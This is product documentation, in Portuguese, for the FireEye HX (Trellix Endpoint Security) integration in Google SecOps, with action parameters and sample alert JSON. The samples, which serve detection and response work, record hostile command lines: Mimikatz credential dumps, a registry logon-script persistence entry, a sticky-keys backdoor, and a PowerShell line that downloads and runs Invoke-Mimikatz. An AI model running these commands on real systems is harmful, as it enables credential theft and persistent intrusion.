FireEye HX
Versão de integração: 17.0
Configure a integração do FireEye HX no Google Security Operations
Para obter instruções detalhadas sobre como configurar uma integração no Google SecOps, consulte o artigo Configure integrações.
Parâmetros de integração
Use os seguintes parâmetros para configurar a integração:
| Nome a apresentar do parâmetro | Tipo | Valor predefinido | É obrigatório | Descrição |
|---|---|---|---|---|
| Nome da instância | String | N/A | Não | Nome da instância para a qual pretende configurar a integração. |
| Descrição | String | N/A | Não | Descrição da instância. |
| Servidor | String | https://x.x.x.x:<port> | Sim | Endereço da instância do Trellix Endpoint Security. |
| Nome de utilizador | String | N/A | Sim | O endereço de email do utilizador que deve ser usado para estabelecer ligação ao Trellix Endpoint Security. |
| Palavra-passe | Palavra-passe | N/A | Sim | A palavra-passe do utilizador correspondente. |
| Validar SSL | Caixa de verificação | Marcado | Não | Use esta caixa de verificação se a sua ligação ao Trellix Endpoint Security exigir uma validação SSL (selecionada por predefinição). |
| Executar remotamente | Caixa de verificação | Desmarcado | Não | Selecione o campo para executar a integração configurada remotamente. Depois de selecionada, a opção aparece para selecionar o utilizador remoto (agente). |
Ações
Cancele a contenção do anfitrião
Descrição
Crie um anfitrião de cancelamento que contenha uma tarefa no servidor do Trellix Endpoint Security com base no IP do Google SecOps ou no anfitrião de entidades do Google SecOps.
Executar em
Esta ação é executada nas seguintes entidades:
- Endereço IP
- Nome do anfitrião
Resultados da ação
Resultado do script
| Nome do resultado do script | Opções de valor | Exemplo |
|---|---|---|
| is_success | Verdadeiro/Falso | is_success:False |
Resultado JSON
N/A
Anfitrião de contenção
Descrição
Crie uma tarefa de contenção de anfitrião no servidor Trellix Endpoint Security com base no IP do Google SecOps ou aloje entidades do Google SecOps.
Parâmetros
| Parâmetro | Tipo | Valor predefinido | É obrigatório | Descrição |
|---|---|---|---|---|
| Aprove a contenção | Caixa de verificação | Desmarcado | Não | Especifique se um pedido de contenção para o anfitrião deve ser aprovado automaticamente para criar uma tarefa de anfitrião de contenção no servidor do Trellix Endpoint Security. Se não for aprovado automaticamente, um pedido de contenção pode ser aprovado na consola Web do Trellix Endpoint Security. |
Executar em
Esta ação é executada nas seguintes entidades:
- Endereço IP
- Nome do anfitrião
Resultados da ação
Resultado do script
| Nome do resultado do script | Opções de valor | Exemplo |
|---|---|---|
| is_success | Verdadeiro/Falso | is_success:False |
Resultado JSON
N/A
Receba alertas
Descrição
Receba alertas do Trellix Endpoint Security com base na entidade do Google SecOps e nas condições de pesquisa fornecidas. A ação funciona no anfitrião ou nas entidades de IP do Google SecOps.
Parâmetros
| Nome a apresentar do parâmetro | Tipo | Valor predefinido | É obrigatório | Descrição |
|---|---|---|---|---|
| Limite | Número inteiro | N/A | Não | Quantos alertas a ação deve devolver, por exemplo, 100. |
| Tem modo partilhado | Lista pendente _(predefinição = qualquer)_ | _default = any_ | Não | Filtre alertas acionados a partir de indicadores com um modo de partilha específico. _Valores disponíveis: any, restricted e unrestricted._ |
| Estado de resolução do alerta | Lista pendente _(predefinição = qualquer)_ | _default = any_ | Não | Filtre alertas com base no estado de resolução dos alertas. Valores disponíveis: _any, active_threat, alert, block, partial_block._ |
| Alerta denunciado nas últimas x horas | Número inteiro | N/A | Não | Filtre os alertas comunicados nas últimas x horas, por exemplo, nas últimas 4 horas. |
| Origem do alerta | Lista pendente _(predefinição = qualquer)_ | _default = any_ | Não | Origem do alerta. Valores disponíveis: any, exd (exploit detection), mal (malware alert), ioc (indicator of compromise). |
| ID da condição | String | N/A | Não | Filtre alertas por um identificador de condição específico. |
| ID do alerta | String | N/A | Não | Devolva um alerta específico pelo identificador do alerta. |
Executar em
Esta ação é executada nas seguintes entidades:
- Endereço IP
- Nome do anfitrião
Resultados da ação
Resultado do script
| Nome do resultado do script | Opções de valor | Exemplo |
|---|---|---|
| is_success | Verdadeiro/Falso | is_success:False |
Resultado JSON
[
{
"EntityResult": [{
"indicator": {
"category": "Mandiant",
"display_name": "MIMIKATZ SUSPICIOUS PROCESS ARGUMENTS (METHODOLOGY)",
"name": "MIMIKATZ SUSPICIOUS PROCESS ARGUMENTS (METHODOLOGY)",
"url": "/hx/api/v3/indicators/mandiant/b7eae353_be50_44cf_8773_7067e9c66d7b",
"signature": null,
"_id": "b7eae353-be50-44cf-8773-7067e9c66d7b",
"uri_name": "b7eae353-be50-44cf-8773-7067e9c66d7b"
},
"event_id": 12880,
"event_values": {
"processEvent/processCmdLine": "at 13:00 \\\"C:\\\\TMP\\\\mim.exe sekurlsa::LogonPasswords > C:\\\\TMP\\\\o.txt\\\"",
"processEvent/parentPid": 4832,
"processEvent/md5": "e2a9c62b47f64525f7eb0cb8d637ff90",
"processEvent/processPath": "C:\\\\Windows\\\\System32\\\\at.exe",
"processEvent/parentProcess": "cmd.exe",
"processEvent/timestamp": "2020-05-29T10:21:03.419Z",
"processEvent/startTime": "2020-05-29T10:21:03.419Z",
"processEvent/process": "at.exe",
"processEvent/username": "DOMAIN-COM\\\\Administrator",
"processEvent/pid": 7332,
"processEvent/parentProcessPath": "C:\\\\Windows\\\\System32\\\\cmd.exe",
"processEvent/eventType": "start"
},
"event_type": "processEvent",
"subtype": null,
"reported_at": "2020-05-29T10:24:05.410Z",
"decorators": [],
"md5values": ["e2a9c62b47f64525f7eb0cb8d637ff90"],
"appliance": {
"_id": "86B7F11ACF8D"
},
"agent": {
"url": "/hx/api/v3/hosts/FqNP4ybCdrlfVqG3lrCvRP",
"_id": "FqNP4ybCdrlfVqG3lrCvRP",
"containment_state": "normal"
},
"is_false_positive": false,
"event_at": "2020-05-29T10:21:03.419Z",
"source": "IOC",
"matched_at": "2020-05-29T10:23:22.000Z",
"decorator_statuses": [],
"url": "/hx/api/v3/alerts/88",
"_id": 88,
"resolution": "ALERT",
"condition": {
"url": "/hx/api/v3/conditions/yirelRwhiuXlF0bQhTL4GA==",
"_id": "yirelRwhiuXlF0bQhTL4GA=="
},
"matched_source_alerts": []
}],
"Entity": "PC-01"
}
]
Obtenha detalhes do grupo de alertas
Descrição
Obtenha detalhes completos do grupo de alertas fornecido pelo respetivo ID.
Parâmetros
| Nome a apresentar do parâmetro | Tipo | Valor predefinido | É obrigatório | Descrição |
|---|---|---|---|---|
| ID dos grupos de alertas | String | N/A | Sim | Especifique uma lista de IDs de grupos de alertas separados por vírgulas para os quais quer obter detalhes. |
Executar em
Esta ação não é executada em entidades, tem um parâmetro de entrada obrigatório.
Resultados da ação
Resultado do script
| Nome do resultado do script | Opções de valor | Exemplo |
|---|---|---|
| is_success | Verdadeiro/Falso | is_success:False |
Resultado JSON
{
"details": [],
"route": "/hx/api/v3/alert_groups/id",
"data": {
"_id": "622d3688031aa40faa4bd86028841276",
"assessment": "[Process reg.exe started] MIMIKATZ SUSPICIOUS PROCESS ARGUMENTS (METHODOLOGY)",
"file_full_path": "C:\\Windows\\System32\\reg.exe",
"first_event_at": "2020-08-06T06:32:55.761Z",
"last_event_at": "2020-08-06T06:32:55.761Z",
"dispositions": [],
"source": "IOC",
"has_fp_disposition": false,
"last_alert": {
"_id": 729,
"agent": {
"_id": "QKQ0SinOZUbehz5AgFXQhX",
"url": "/hx/api/v3/hosts/QKQ0SinOZUbehz5AgFXQhX",
"hostname": "HW-HOST-024",
"containment_state": "normal"
},
"condition": {
"_id": "yirelRwhiuXlF0bQhTL4GA==",
"url": "/hx/api/v3/conditions/yirelRwhiuXlF0bQhTL4GA=="
},
"event_at": "2020-08-06T06:32:55.761+00:00",
"matched_at": "2020-08-06T06:37:55+00:00",
"reported_at": "2020-12-18T14:03:18.856+00:00",
"source": "IOC",
"resolution": "ALERT",
"decorators": [],
"md5values": [
"05cf3ce225b05b669e3118092f4c8eab"
],
"decorator_sources": [],
"decorator_statuses": [],
"url": "/hx/api/v3/alerts/729",
"event_id": 207,
"event_type": "processEvent",
"event_values": {
"processEvent/timestamp": "2020-08-06T06:32:55.761Z",
"processEvent/eventType": "start",
"processEvent/pid": 10356,
"processEvent/processPath": "C:\\Windows\\System32\\reg.exe",
"processEvent/process": "reg.exe",
"processEvent/parentPid": 9456,
"processEvent/parentProcessPath": "C:\\Windows\\System32\\cmd.exe",
"processEvent/parentProcess": "cmd.exe",
"processEvent/username": "FIREEYE-LAB\\Administrator",
"processEvent/startTime": "2020-08-06T06:32:55.761Z",
"processEvent/md5": "05cf3ce225b05b669e3118092f4c8eab",
"processEvent/processCmdLine": "REG ADD HKCU\\Environment /f /v UserInitMprLogonScript /t REG_MULTI_SZ /d \"C:\\TMP\\mim.exe sekurlsa::LogonPasswords > C:\\TMP\\o.txt\""
},
"is_false_positive": false
},
"generic_alert_badge": null,
"generic_alert_label": null,
"stats": {
"events": 1
},
"url": "/hx/api/v3/alert_groups/622d3688031aa40faa4bd86028841276",
"created_at": "2020-12-18T14:03:24.535Z",
"acknowledgement": {
"acknowledged": false,
"acknowledged_by": null,
"acknowledged_time": null,
"comment": null,
"comment_update_time": null
},
"grouped_by": {
"condition_id": "yirelRwhiuXlF0bQhTL4GA==",
"detected_by": "ioc_engine",
"host": {
"_id": "QKQ0SinOZUbehz5AgFXQhX",
"url": "/hx/api/v3/hosts/QKQ0SinOZUbehz5AgFXQhX",
"hostname": "HW-HOST-024",
"primary_ip_address": "172.30.202.55"
}
}
},
"message": "OK"
}
Case Wall
| Tipo de resultado | Valor/descrição | Tipo |
| Mensagem de saída* | Sucesso para 1 (is_success=true): Os detalhes sobre os seguintes grupos de alertas no Trellix Endpoint Security foram obtidos com êxito: {alert group ids} Unsuccess for 1 (is_success=true): não foi possível obter detalhes sobre os seguintes grupos de alertas no Trellix Endpoint Security: {alert group ids} Sem êxito para todos (is_success=false): nenhum dos grupos de alertas fornecidos foi encontrado no Trellix Endpoint Security. |
Geral |
| Case Wall | Nome: detalhes do grupo de alertas
|
Geral |
Receba alertas no grupo de alertas
Descrição
Receber todos os alertas encontrados no grupo de alertas especificado
Parâmetros
| Nome a apresentar do parâmetro | Tipo | Valor predefinido | É obrigatório | Descrição |
|---|---|---|---|---|
| ID do grupo de alertas | String | N/A | Sim | Especifique uma lista de IDs de grupos de alertas separados por vírgulas para os quais quer obter detalhes. |
| Limite | Número inteiro | 50 | Não | Especifique a quantidade máxima de fichas de alertas devolvidas pela API para o grupo de alertas. A predefinição é 50. |
Executar em
Esta ação não é executada em entidades, tem um parâmetro de entrada obrigatório.
Resultados da ação
Resultado do script
| Nome do resultado do script | Opções de valor | Exemplo |
|---|---|---|
| is_success | Verdadeiro/Falso | is_success:False |
Resultado JSON
{
"data": {
"total": 2,
"query": {},
"sort": {},
"offset": 0,
"limit": 50,
"entries": [
{
"_id": 712,
"agent": {
"_id": "9GJe9n4Ynd5dFtZ8wCjIu7",
"url": "/hx/api/v3/hosts/9GJe9n4Ynd5dFtZ8wCjIu7",
"containment_state": "normal"
},
"condition": {
"_id": "2npvcLf_arxPaH717hQZ9g==",
"url": "/hx/api/v3/conditions/2npvcLf_arxPaH717hQZ9g=="
},
"indicator": {
"_id": "f0e49db2-1c28-4529-a426-73251d92de7d",
"url": "/hx/api/v3/indicators/mandiant/f0e49db2_1c28_4529_a426_73251d92de7d",
"name": "EASE OF ACCESS BACKDOORS (METHODOLOGY)",
"uri_name": "f0e49db2-1c28-4529-a426-73251d92de7d",
"display_name": "EASE OF ACCESS BACKDOORS (METHODOLOGY)",
"signature": null,
"category": "Mandiant"
},
"event_at": "2020-12-10T08:04:09.521Z",
"matched_at": "2020-12-10T08:04:43.000Z",
"reported_at": "2020-12-10T08:04:49.607Z",
"source": "IOC",
"subtype": null,
"matched_source_alerts": [],
"resolution": "ALERT",
"is_false_positive": false,
"decorators": [],
"md5values": [],
"decorator_statuses": [],
"url": "/hx/api/v3/alerts/712",
"event_id": 853899,
"event_type": "regKeyEvent",
"event_values": {
"regKeyEvent/timestamp": "2020-12-10T08:04:09.521Z",
"regKeyEvent/hive": "HKEY_LOCAL_MACHINE\\SOFTWARE",
"regKeyEvent/keyPath": "Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe",
"regKeyEvent/path": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger",
"regKeyEvent/eventType": 1,
"regKeyEvent/pid": 8800,
"regKeyEvent/process": "reg.exe",
"regKeyEvent/processPath": "C:\\Windows\\System32",
"regKeyEvent/valueName": "Debugger",
"regKeyEvent/valueType": "REG_SZ",
"regKeyEvent/value": "QwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAGMAbQBkAC4AZQB4AGUAAAA=",
"regKeyEvent/text": "C:\\Windows\\System32\\cmd.exe",
"regKeyEvent/username": "FIREEYE-LAB\\Administrator"
},
"appliance": {
"_id": "86B7F11ACF8D"
}
},
{
"_id": 723,
"agent": {
"_id": "9GJe9n4Ynd5dFtZ8wCjIu7",
"url": "/hx/api/v3/hosts/9GJe9n4Ynd5dFtZ8wCjIu7",
"containment_state": "normal"
},
"condition": {
"_id": "2npvcLf_arxPaH717hQZ9g==",
"url": "/hx/api/v3/conditions/2npvcLf_arxPaH717hQZ9g=="
},
"indicator": {
"_id": "f0e49db2-1c28-4529-a426-73251d92de7d",
"url": "/hx/api/v3/indicators/mandiant/f0e49db2_1c28_4529_a426_73251d92de7d",
"name": "EASE OF ACCESS BACKDOORS (METHODOLOGY)",
"uri_name": "f0e49db2-1c28-4529-a426-73251d92de7d",
"display_name": "EASE OF ACCESS BACKDOORS (METHODOLOGY)",
"signature": null,
"category": "Mandiant"
},
"event_at": "2020-12-10T09:26:14.114Z",
"matched_at": "2020-12-10T09:26:56.000Z",
"reported_at": "2020-12-10T09:27:08.735Z",
"source": "IOC",
"subtype": null,
"matched_source_alerts": [],
"resolution": "ALERT",
"is_false_positive": false,
"decorators": [],
"md5values": [],
"decorator_statuses": [],
"url": "/hx/api/v3/alerts/723",
"event_id": 880771,
"event_type": "regKeyEvent",
"event_values": {
"regKeyEvent/timestamp": "2020-12-10T09:26:14.114Z",
"regKeyEvent/hive": "HKEY_LOCAL_MACHINE\\SOFTWARE",
"regKeyEvent/keyPath": "Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe",
"regKeyEvent/path": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger",
"regKeyEvent/eventType": 1,
"regKeyEvent/pid": 8740,
"regKeyEvent/process": "reg.exe",
"regKeyEvent/processPath": "C:\\Windows\\System32",
"regKeyEvent/valueName": "Debugger",
"regKeyEvent/valueType": "REG_SZ",
"regKeyEvent/value": "QwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAGMAbQBkAC4AZQB4AGUAAAA=",
"regKeyEvent/text": "C:\\Windows\\System32\\cmd.exe",
"regKeyEvent/username": "FIREEYE-LAB\\Administrator"
},
"appliance": {
"_id": "86B7F11ACF8D"
}
}
]
},
"message": "OK",
"details": [],
"route": "/hx/api/v3/alert_groups/group_id/alerts"
}
Case Wall
| Tipo de resultado | Valor/descrição | Tipo |
|---|---|---|
| Mensagem de saída* | Sucesso para 1 (is_success=true): Foram obtidos com êxito detalhes sobre os seguintes grupos de alertas no Trellix Endpoint Security: {alert group ids} Unsuccess for 1 (is_success=true): não foi possível obter detalhes sobre os seguintes grupos de alertas no Trellix Endpoint Security: {alert group ids} Sem êxito para todos (is_success=false): nenhum dos grupos de alertas fornecidos foi encontrado no Trellix Endpoint Security. |
Geral |
| Case Wall | Nome: "Trellix Endpoint Security Alert Group +{alert_group_id) Alerts"
|
Geral |
Receba informações do anfitrião
Descrição
Enriqueça as entidades de anfitrião ou IP do Google SecOps com base nas informações do Trellix Endpoint Security.
Executar em
Esta ação é executada nas seguintes entidades:
- Endereço IP
- Nome do anfitrião
Resultados da ação
Resultado do script
| Nome do resultado do script | Opções de valor | Exemplo |
|---|---|---|
| is_success | Verdadeiro/Falso | is_success:False |
Resultado JSON
[
{
"EntityResult": {
"last_alert": {
"url": "/hx/api/v3/alerts/254",
"_id": 254
},
"domain": "EXAMPLE-COM",
"last_exploit_block_timestamp": null,
"containment_state": "normal",
"timezone": "\\u05e9\\u05e2\\u05d5\\u05df \\u05e7\\u05d9\\u05e5 \\u05d9\\u05e8\\u05d5\\u05e9\\u05dc\\u05d9\\u05dd",
"gmt_offset_seconds": 10800,
"initial_agent_checkin": "2020-05-29T10:11:12.022Z",
"stats": {
"alerting_conditions": 10,
"exploit_alerts": 0,
"acqs": 4,
"malware_false_positive_alerts": 0,
"alerts": 10,
"exploit_blocks": 0,
"false_positive_alerts": 0,
"malware_cleaned_count": 0,
"malware_alerts": 0,
"false_positive_alerts_by_source": {},
"generic_alerts": 0,
"malware_quarantined_count": 0
},
"primary_mac": "00-50-56-11-22-33",
"hostname": "HW-HOST-025",
"primary_ip_address": "1.1.1.1",
"last_audit_timestamp": "2020-06-01T09:10:38.752Z",
"last_alert_timestamp": "2020-06-01T08:02:30.817+00:00",
"containment_queued": false,
"sysinfo": {
"url": "/hx/api/v3/hosts/FqNP4ybCdrlfVqG3lrCvRP/sysinfo"
},
"last_exploit_block": null,
"reported_clone": false,
"url": "/hx/api/v3/hosts/FqNP4ybCdrlfVqG3lrCvRP",
"excluded_from_containment": false,
"last_poll_timestamp": "2020-06-01T09:10:36.000Z",
"last_poll_ip": "1.1.1.1",
"containment_missing_software": false,
"_id": "FqNP4ybCdrlfVqG3lrCvRP",
"os": {
"kernel_version": null,
"platform": "win",
"patch_level": null,
"bitness": "64-bit",
"product_name": "Windows 10 Pro"
},
"agent_version": "32.30.0"
},
"Entity": "PC-01"
}
]
Get Indicator
Descrição
Obtenha informações sobre um indicador específico do servidor Trellix Endpoint Security.
Parâmetros
| Nome a apresentar do parâmetro | Tipo | Valor predefinido | É obrigatório | Descrição |
|---|---|---|---|---|
| Categoria de indicadores | String | N/A | Sim | Especifique o valor uri_name da categoria do indicador. Pode encontrar uri_name executando a ação "Get Indicators". |
| Nome do indicador | String | N/A | Sim | Especifique o valor uri_name do indicador. Pode encontrar uri_name executando a ação "Get Indicators" (Obter indicadores). |
Executar em
Esta ação é executada em todas as entidades.
Resultados da ação
Resultado do script
| Nome do resultado do script | Opções de valor | Exemplo |
|---|---|---|
| is_success | Verdadeiro/Falso | is_success:False |
Resultado JSON
{
"category": {
"url": "/hx/api/v3/indicator_categories/mandiant_unrestricted",
"_id": 7,
"uri_name": "mandiant_unrestricted",
"name": "Mandiant Unrestricted Intel",
"share_mode": "unrestricted"
},
"display_name": "FIREEYE END2END TEST",
"description": "IOC used for testing HX appliances and content packages to ensure that things work end to end",
"create_actor": {
"username": "mandiant",
"_id": 3
},
"active_since": "2020-05-28T13:08:08.513Z",
"url": "/hx/api/v3/indicators/mandiant_unrestricted/2b4753b0_9972_477e_ba16_1a7c29058cee",
"_revision": "20200528130929238120103414",
"create_text": "General_Windows_unrestricted_2020.05.270833",
"created_by": "General_Windows_unrestricted_2020.05.270833",
"update_actor": {
"username": "mandiant",
"_id": 3
},
"meta": null,
"signature": null,
"platforms": ["win\", \"osx\", \"linux"],
"stats": {
"source_alerts": 0,
"alerted_agents": 1,
"active_conditions": 7
},
"_id": "2b4753b0-9972-477e-ba16-1a7c29058cee",
"uri_name": "2b4753b0-9972-477e-ba16-1a7c29058cee",
"name": "FIREEYE END2END TEST"
}
Obtenha indicadores
Descrição
Obtenha informações sobre indicadores de comprometimento (IOC) do servidor de segurança de pontos finais da Trellix com base nos parâmetros de pesquisa fornecidos.
Parâmetros
| Nome a apresentar do parâmetro | Tipo | Valor predefinido | É obrigatório | Descrição |
|---|---|---|---|---|
| Categoria de indicadores | String | N/A | Não | A categoria do indicador. |
| Termo de pesquisa | String | N/A | Não | O termo de pesquisa pode ser qualquer nome, categoria, assinatura, origem ou valor de condição. |
| Limite | String | N/A | Não | Quantos indicadores a ação deve devolver, por exemplo, 100. |
| Modo partilhado | Lista pendente _(predefinição = qualquer)_ | _default = any_ | Não | Filtre indicadores com base no modo de partilha específico. _Valores disponíveis: any, restricted, unrestricted._ |
| Ordenar por campo | String | N/A | Não | Ordena os resultados pelo campo especificado por ordem ascendente. |
| Criado por | String | N/A | Não | Filtre os indicadores com base no autor. |
| Tem alertas associados | Caixa de verificação | N/A | Não | Especifique se apenas devem ser devolvidos indicadores com alertas associados. |
Executar em
Esta ação é executada em todas as entidades.
Resultados da ação
Resultado do script
| Nome do resultado do script | Opções de valor | Exemplo |
|---|---|---|
| is_success | Verdadeiro/Falso | is_success:False |
Resultado JSON
[
{
"category": {
"url": "/hx/api/v3/indicator_categories/mandiant_unrestricted",
"_id": 7,
"uri_name": "mandiant_unrestricted",
"name": "Mandiant Unrestricted Intel",
"share_mode": "unrestricted"
},
"display_name": "FIREEYE END2END TEST",
"description": "IOC used for testing HX appliances and content packages to ensure that things work end to end",
"create_actor": {
"username": "mandiant",
"_id": 3
},
"active_since": "2020-05-28T13:08:08.513Z",
"url": "/hx/api/v3/indicators/mandiant_unrestricted/2b4753b0_9972_477e_ba16_1a7c29058cee",
"_revision": "20200528130929238120103414",
"create_text": "General_Windows_unrestricted_2020.05.270833",
"created_by": "General_Windows_unrestricted_2020.05.270833",
"update_actor": {
"username": "mandiant",
"_id": 3
},
"meta": null,
"signature": null,
"platforms": ["win", "osx", "linux"],
"stats": {
"source_alerts": 0,
"alerted_agents": 1,
"active_conditions": 7
},
"_id": "2b4753b0-9972-477e-ba16-1a7c29058cee",
"uri_name": "2b4753b0-9972-477e-ba16-1a7c29058cee",
"name": "FIREEYE END2END TEST"
}
]
Obtenha a lista de aquisições de ficheiros para o anfitrião
Descrição
Obtenha uma lista de aquisições de ficheiros pedidas para o anfitrião a partir do servidor do Trellix Endpoint Security. A ação funciona em entidades do Google SecOps de anfitrião ou IP.
Parâmetros
| Nome a apresentar do parâmetro | Tipo | Valor predefinido | É obrigatório | Descrição |
|---|---|---|---|---|
| Termo de pesquisa | String | N/A | Não | Pesquisa todas as aquisições de ficheiros para anfitriões ligados ao servidor do Trellix Endpoint Security. O search_term pode ser qualquer valor de condição. |
| Limite | String | N/A | Não | Quantos registos a ação deve devolver, por exemplo, 100. |
| Campo de filtro | String | N/A | Não | Apresenta apenas os resultados com o valor do campo especificado. Os resultados podem ser filtrados pelo identificador de correlação externo (external_id). |
Executar em
Esta ação é executada nas seguintes entidades:
- Endereço IP
- Nome do anfitrião
Resultados da ação
Resultado do script
| Nome do resultado do script | Opções de valor | Exemplo |
|---|---|---|
| is_success | Verdadeiro/Falso | is_success:False |
Resultado JSON
[
{
"EntityResult": [{
"comment": " ",
"zip_passphrase": "unzip-me",
"indicator": {
"url": null,
"_id": "FqNP4ybCdrlfVqG3lrCvRP"
},
"request_actor": {
"username": "admin",
"_id": 1000
},
"request_time": "2020-06-01T08:43:14.000Z",
"finish_time": "2020-06-01T08:46:39.156Z",
"_revision": "20200601084639156575147403",
"error_message": "The acquisition completed with issues.",
"req_use_api": false,
"alert": {
"url": null,
"_id": "FqNP4ybCdrlfVqG3lrCvRP"
},
"url": "/hx/api/v3/acqs/files/9",
"state": "COMPLETE",
"host": {
"url": "/hx/api/v3/hosts/FqNP4ybCdrlfVqG3lrCvRP",
"_id":
"FqNP4ybCdrlfVqG3lrCvRP"
},
"req_filename": "reg.exe",
"req_path": "C:\\\\Windows\\\\System32",
"_id": 9,
"external_id": null,
"condition": {
"url": null,
"_id": "FqNP4ybCdrlfVqG3lrCvRP"
},
"md5": "601bddf7691c5af626a5719f1d7e35f1"
}],
"Entity": "PC-01"
}
]
Is Contain Malware Alerts
Descrição
Verifique se existem alertas de software malicioso para as entidades de IP ou de anfitrião do Google SecOps fornecidas no servidor do Trellix Endpoint Security.
Executar em
Esta ação é executada nas seguintes entidades:
- Endereço IP
- Nome do anfitrião
Resultados da ação
Resultado do script
| Nome do resultado do script | Opções de valor | Exemplo |
|---|---|---|
| is_success | Verdadeiro/Falso | is_success:False |
Resultado JSON
[
{
"EntityResult": {
"alerting_conditions": 10,
"exploit_alerts": 0,
"acqs": 4,
"malware_false_positive_alerts": 0,
"alerts": 10,
"exploit_blocks": 0,
"false_positive_alerts": 0,
"malware_cleaned_count": 0,
"malware_alerts": 0,
"false_positive_alerts_by_source": {},
"generic_alerts": 0,
"malware_quarantined_count": 0
},
"Entity": "PC-01"
}
]
Tchim-tchim
Descrição
Teste a conetividade ao servidor Trellix Endpoint Security com os parâmetros fornecidos na página de configuração da integração no separador Google Security Operations Marketplace.
Executar em
Esta ação é executada em todas as entidades.
Resultados da ação
Resultado do script
| Nome do resultado do script | Opções de valor | Exemplo |
|---|---|---|
| is_success | Verdadeiro/Falso | is_success:False |
Resultado JSON
N/A
Confirme grupos de alertas
Descrição
Confirme os grupos de alertas processados pelo Google SecOps para uma melhor sincronização entre a plataforma HX e o Google SecOps.
Parâmetros
| Nome a apresentar do parâmetro | Tipo | Valor predefinido | É obrigatório | Descrição |
|---|---|---|---|---|
| IDs dos grupos de alertas | Lista separada por vírgulas | N/A | Sim | Especifique os IDs dos grupos de alertas que quer confirmar numa lista separada por vírgulas. |
| Reconhecimento | LDD | Confirmar | Sim | Especifique se quer confirmar ou anular a confirmação dos grupos de alertas especificados. |
| Comentário de confirmação | String | N/A | Não | Especifique o comentário de confirmação que quer adicionar aos grupos de alertas relevantes. |
| Limite | Número inteiro | N/A | Não | Especifique a quantidade máxima de fichas de grupos de alertas devolvidas pela API no resultado JSON. |
Executar em
Esta ação não é executada em entidades, tem um parâmetro de entrada obrigatório.
Resultados da ação
Resultado do script
| Nome do resultado do script | Opções de valor | Exemplo |
|---|---|---|
| is_success | Verdadeiro/Falso | is_success:False |
Resultado JSON
{
"data": {
"total": 2,
"query": {},
"sort": {},
"offset": 0,
"limit": 50,
"entries": [
{
"_id": "4532f4d8d50ab50a7830e2823ac488fd",
"assessment": "[Process powershell.exe started] POWERSHELL DOWNLOADER (METHODOLOGY)",
"file_full_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"first_event_at": "2020-08-17T12:03:38.496Z",
"last_event_at": "2020-12-10T08:02:22.561Z",
"dispositions": [],
"source": "IOC",
"has_fp_disposition": false,
"last_alert": {
"_id": 718,
"agent": {
"_id": "9GJe9n4Ynd5dFtZ8wCjIu7",
"url": "/hx/api/v3/hosts/9GJe9n4Ynd5dFtZ8wCjIu7",
"hostname": "HW-HOST-FY01",
"containment_state": "normal"
},
"condition": {
"_id": "yQjMv_j5PKfjL8Qu5uSm4A==",
"url": "/hx/api/v3/conditions/yQjMv_j5PKfjL8Qu5uSm4A=="
},
"event_at": "2020-08-17T12:03:38.496+00:00",
"matched_at": "2020-12-10T09:26:55+00:00",
"reported_at": "2020-12-10T09:27:08.624+00:00",
"source": "IOC",
"resolution": "ALERT",
"decorators": [],
"md5values": [
"cda48fc75952ad12d99e526d0b6bf70a"
],
"decorator_sources": [],
"decorator_statuses": [],
"url": "/hx/api/v3/alerts/718",
"event_id": 39882,
"event_type": "processEvent",
"event_values": {
"processEvent/timestamp": "2020-08-17T12:03:38.496Z",
"processEvent/eventType": "start",
"processEvent/pid": 9896,
"processEvent/processPath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"processEvent/process": "powershell.exe",
"processEvent/parentPid": 5560,
"processEvent/parentProcessPath": "C:\\Windows\\System32\\cmd.exe",
"processEvent/parentProcess": "cmd.exe",
"processEvent/username": "FIREEYE-LAB\\Administrator",
"processEvent/startTime": "2020-08-17T12:03:38.496Z",
"processEvent/md5": "cda48fc75952ad12d99e526d0b6bf70a",
"processEvent/processCmdLine": "powershell.exe \"iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds\" "
},
"is_false_positive": false
},
"generic_alert_badge": null,
"generic_alert_label": null,
"stats": {
"events": 3
},
"url": "/hx/api/v3/alert_groups/4532f4d8d50ab50a7830e2823ac488fd",
"created_at": "2020-12-10T09:26:56.056Z",
"acknowledgement": {
"acknowledged": true,
"acknowledged_by": "test2",
"acknowledged_time": "2020-12-22T19:00:25.688Z",
"comment": "test comment",
"comment_update_time": "2020-12-22T19:00:25.688Z"
},
"grouped_by": {
"condition_id": "yQjMv_j5PKfjL8Qu5uSm4A==",
"detected_by": "ioc_engine",
"host": {
"_id": "9GJe9n4Ynd5dFtZ8wCjIu7",
"url": "/hx/api/v3/hosts/9GJe9n4Ynd5dFtZ8wCjIu7",
"hostname": "HW-HOST-FY01",
"primary_ip_address": "172.30.202.152"
}
}
},
{
"_id": "e9f4d7baaa362d9d5d0b6e053ba0d44d",
"assessment": "[Registry key event] EASE OF ACCESS BACKDOORS (METHODOLOGY)",
"file_full_path": "",
"first_event_at": "2020-12-10T08:04:09.521Z",
"last_event_at": "2020-12-10T09:26:14.114Z",
"dispositions": [],
"source": "IOC",
"has_fp_disposition": false,
"last_alert": {
"_id": 723,
"agent": {
"_id": "9GJe9n4Ynd5dFtZ8wCjIu7",
"url": "/hx/api/v3/hosts/9GJe9n4Ynd5dFtZ8wCjIu7",
"hostname": "HW-HOST-FY01",
"containment_state": "normal"
},
"condition": {
"_id": "2npvcLf_arxPaH717hQZ9g==",
"url": "/hx/api/v3/conditions/2npvcLf_arxPaH717hQZ9g=="
},
"event_at": "2020-12-10T09:26:14.114+00:00",
"matched_at": "2020-12-10T09:26:56+00:00",
"reported_at": "2020-12-10T09:27:08.735+00:00",
"source": "IOC",
"resolution": "ALERT",
"decorators": [],
"md5values": [],
"decorator_sources": [],
"decorator_statuses": [],
"url": "/hx/api/v3/alerts/723",
"event_id": 880771,
